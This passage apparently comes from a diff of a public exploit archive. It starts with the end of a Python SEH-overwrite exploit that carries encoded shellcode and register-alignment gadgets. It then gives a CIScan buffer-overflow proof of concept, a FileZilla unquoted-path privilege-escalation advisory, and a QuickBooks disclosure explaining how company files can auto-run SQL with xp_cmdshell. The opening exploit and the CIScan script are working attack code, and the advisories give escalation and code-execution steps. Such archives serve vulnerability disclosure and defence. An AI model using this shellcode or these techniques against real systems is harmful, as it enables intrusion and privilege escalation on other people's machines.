"\x4d\x4c\x38\x57\x4b\x33\x4d\x47\x54\x52\x55\x4b\x54\x30\x58"
"\x4c\x4b\x31\x48\x36\x44\x43\x31\x59\x43\x43\x56\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x46\x38\x35\x4c\x45\x51\x4e\x33\x4c\x4b"
"\x34\x44\x4c\x4b\x45\x51\x58\x50\x4b\x39\x51\x54\x36\x44\x57"
"\x54\x51\x4b\x31\x4b\x33\x51\x36\x39\x51\x4a\x30\x51\x4b\x4f"
"\x4b\x50\x51\x4f\x31\x4f\x30\x5a\x4c\x4b\x45\x42\x4a\x4b\x4c"
"\x4d\x51\x4d\x33\x5a\x55\x51\x4c\x4d\x4d\x55\x58\x32\x35\x50"
"\x45\x50\x45\x50\x56\x30\x33\x58\x30\x31\x4c\x4b\x42\x4f\x4d"
"\x57\x4b\x4f\x38\x55\x4f\x4b\x4a\x50\x4e\x55\x39\x32\x50\x56"
"\x52\x48\x59\x36\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x49\x45\x37"
"\x4c\x35\x56\x33\x4c\x44\x4a\x4d\x50\x4b\x4b\x4b\x50\x42\x55"
"\x33\x35\x4f\x4b\x37\x37\x55\x43\x53\x42\x52\x4f\x53\x5a\x33"
"\x30\x46\x33\x4b\x4f\x39\x45\x53\x53\x45\x31\x52\x4c\x35\x33"
"\x35\x50\x41\x41"
)
eax_zeroed = '\x25\x2E\x2E\x2E\x2E'
eax_zeroed += '\x25\x11\x11\x11\x11'
align_to_eax = "\x54\x58" # Get ESP and pop it into EAX
align_to_eax += "\x2d\x7d\x7d\x7d\x7d" # SUB EAX, 0x7d7d7d7d
align_to_eax += "\x2d\x01\x01\x01\x01" # SUB EAX, 0x01010101
align_to_eax += "\x2d\x01\x01\x02\x02" # SUB EAX, 0x02020101
align_to_eax += "\x2d\x7c\x73\x7f\x7f" # SUB EAX, 0x7f7f737c
buffer = "\x41" * 1865
buffer += "\x42\x42\x71\x04" # Pointer to Next SEH Record
buffer += "\x78\x2a\x01\x10" # SEH HANDLER
buffer += eax_zeroed
buffer += align_to_eax
buffer += "\x43" * 5
buffer += shellcode
buffer += "E" * 4
f = open('exploit.txt', "wb")
f.write(buffer)
f.close()

29
platforms/windows/dos/39802.py Executable file
View file

@ -0,0 +1,29 @@
#!/usr/bin/python
# Exploit Title : CIScanv1.00 Hostname/IP Field SEH Overwrite POC
# Discovery by : Nipun Jaswal
# Email : mail@nipunjaswal.info
# Discovery Date : 11/05/2016
# Software Link : http://www.mcafee.com/us/downloads/free-tools/ciscan.aspx
# Tested Version : 1.00
# Vulnerability Type: SEH Overwrite POC
# Tested on OS : Windows 7 Home Basic
# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
#SEH chain of main thread
#Address SE handler
#0012FA98 43434343
#42424242 *** CORRUPT ENTRY ***
# Offset to the SEH Frame is 536
buffer = "A"*536
# Address of the Next SEH Frame
nseh = "B"*4
# Address to the Handler Code, Generally P/P/R Address
seh = "C" *4
f = open("evil.txt", "wb")
f.write(buffer+nseh+seh)
f.close()

43
platforms/windows/local/39803.txt Executable file
View file

@ -0,0 +1,43 @@
-----------------------------------
# Exploit Title: Filezilla 3.17.0.0 windows installer Privileges Escalation
via unquoted path vulnerability
# Date: 08/05/2016
# Exploit Author: Cyril Vallicari
# Vendor Homepage: https://filezilla-project.org/
# Software Link: https://filezilla-project.org/download.php?type=client
# Version: 3.17.0.0
# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
# CVE : Asked it is reviewed (11/08/2016)
Summary : FileZilla is a free software, cross-platform FTP application,
consisting of FileZilla Client and FileZilla Server. Client binaries are
available for Windows, Linux, and Mac OS X.
Description : The installer of Filezilla for Windows version 3.17.0.0 and
probably prior and prone to unquoted path vulnerability .
The unquoted command called is : C:\Program Files\FileZilla FTP
Client\uninstall.exe _?=C:\Program Files\FileZilla FTP Client
This could potentially allow an authorized but non-privileged local user to
execute arbitrary code with elevated privileges on the system.
POC :
Put a software named "Program.exe" in C: (or named
Filezilla.exe/Filezilla FTP.exe in Program Files)
Then uninstall Filezilla from installer
After clicking "Next" on the installer window, Program.exe is execute with
Administrator rights
POC video : https://www.youtube.com/watch?v=r06VwwJ9J4M
Patch :
Fixed in version 3.17.0.1
---------------------------------------------------------------------

51
platforms/windows/local/39804.txt Executable file
View file

@ -0,0 +1,51 @@
+ Credits: Maxim Tomashevich from Thegrideon Software
+ Website: https://www.thegrideon.com/
+ Details: https://www.thegrideon.com/qb-internals-sql.html
Vendor:
---------------------
www.intuit.com
www.intuit.ca
www.intuit.co.uk
Product:
---------------------
QuickBooks Desktop
versions: 2007 - 2016
Vulnerability Type:
---------------------
Arbitrary SQL / Code Execution
Vulnerability Details:
---------------------
QuickBooks company files are SQL Anywhere database files and other QB formats are based on SQL Anywhere features as well. SQL code (Watcom SQL) is important part of QB workflow and it is arguably more powerful than VBA in MS Access or Excel and at the same time it is completely hidden and starts automatically with every opened file!
Functions like xp_write_file, xp_cmdshell are included by default allowing "rootkit" installation in just 3 lines of code: get data from table -> xp_write_file -> xp_cmdshell. Procedure in one database can be used to insert code into another directly or using current user credential. Moreover real database content is hidden from QuickBooks users, so there is virtually unlimited storage for code, stolen data, etc.
QBX (accountant's transfer copies) and QBM (portable company files) are even easier to modify but supposed to be send to outside accountant for processing during normal workflow. QBX and QBM are compressed SQL dumps, so SQL modification is as hard as replacing zlib compressed "reload.sql" file inside compound file.
In all cases QuickBooks do not attempt (and have no ways) to verify SQL scripts and start them automatically with "DBA" privileges.
It should be obvious that all outside files (qbw, qba, qbx, qbm) should be considered extremely dangerous.
SQL Anywhere is built for embedded applications so there are number of tricks and functions (like SET HIDDEN clause) to protect SQL code from analysis making this severe QuickBooks design flaw.
Proof of Concept:
---------------------
Below you can find company file created in QB 2009 and modified to start "Notepad.exe" upon every user login (Admin, no pass). This example will work in any version including 2016 (US, CA, UK) - login procedure execution is required in order to check QB version or edition or to start update, so you will see Notepad before QB "wrong version" error message.
https://www.thegrideon.com/qbint/QBFp.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39804.zip
Disclosure Timeline:
---------------------
Contacted Vendor: 2016-03-21
Contacted PCI Security Consul: 2016-04-15
PCI Security Consul: 2016-04-19 "we are looking into this matter", but no details requested.
PoC sent to Vendor: 2016-04-26
[Unexpected and strange day by day activity from Intuit India employees on our website without any attempts to communicate -> public disclosure.]
Public Disclosure: 2016-05-10
Severity Level:
---------------------
High
Disclaimer:
---------------------
Permission is hereby granted for the redistribution of this text, provided that it is not altered except by reformatting, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.